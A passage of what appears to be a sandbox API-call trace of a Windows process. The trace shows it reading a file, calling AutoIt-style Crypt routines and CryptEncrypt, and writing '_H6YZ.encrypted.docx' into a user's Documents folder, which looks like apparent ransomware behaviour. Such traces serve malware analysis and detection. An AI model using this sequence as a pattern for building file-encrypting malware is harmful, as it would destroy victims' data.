hHeap=0x770000) returned 1 [0037.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0037.069] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0037.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.encrypted.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_h6yz.encrypted.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0037.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.070] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0037.071] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0037.071] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0037.071] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0037.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.071] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0037.071] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0037.074] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x1955, lpOverlapped=0x0) returned 1 [0037.074] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0037.077] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0037.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11955) returned 0xac0018 [0037.078] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.078] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.078] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0037.079] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0037.079] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0037.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.080] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0037.080] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.080] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.080] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0037.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.081] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0037.081] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.081] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.081] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2d8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2d8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.082] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.082] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae968 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0037.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0037.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.083] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.083] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.083] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.083] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0037.083] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.083] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.083] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.083] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.083] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.083] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0037.083] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.084] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.084] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0037.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0037.085] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x11955, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x11960) returned 1 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0037.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.086] CharLowerBuffW (in: lpsz="byte[72033]", cchLength=0xb | out: lpsz="byte[72033]") returned 